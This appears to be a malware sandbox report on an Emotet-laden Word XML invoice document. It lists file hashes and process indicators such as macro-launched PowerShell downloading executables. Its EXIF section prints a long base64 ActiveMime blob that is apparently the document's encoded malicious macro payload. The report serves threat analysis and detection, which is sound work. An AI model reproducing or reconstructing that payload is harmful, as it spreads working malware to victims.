analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Sales-Invoice

Full analysis: https://app.any.run/tasks/6f335336-6fae-42f2-beea-17bcc8a40d6f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 22, 2019, 19:23:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet-doc
emotet
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

02AF2B2605265390740D1F6F615D1CB4

SHA1:

A20A20F3801276B628EF2C73BE7ABDD5C9DAB0A0

SHA256:

7128E6E5E0516C991D67DDE86A8CA0A1D7AFAA529246C3D645E9445BE886E3E1

SSDEEP:

3072:6uXLOI/PIwr8oAxJPjL/xSu90OoiLuDKZXfwKeljR1z:6u7r/PIwr8o2vxUOmD+XfwLX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2672)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2672)
    • Runs app for hidden code execution

      • cmd.exe (PID: 2360)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3804)
    • Application was dropped or rewritten from another process

      • 229.exe (PID: 3792)
      • 229.exe (PID: 2820)
      • wabmetagen.exe (PID: 2704)
      • wabmetagen.exe (PID: 3304)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 4072)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 3000)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4032)
      • cmd.exe (PID: 2360)
      • cmd.exe (PID: 2668)
      • cmd.exe (PID: 2796)
    • Application launched itself

      • cmd.exe (PID: 2668)
      • wabmetagen.exe (PID: 2704)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4072)
      • 229.exe (PID: 2820)
    • Creates files in the user directory

      • powershell.exe (PID: 4072)
    • Starts itself from another location

      • 229.exe (PID: 2820)
    • Connects to unusual port

      • wabmetagen.exe (PID: 3304)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2672)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2672)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 4072)
      • 229.exe (PID: 2820)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 006F3A2D
WordDocumentBodySectPRsidRDefault: 00E9115B
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 005A24B1
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: 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 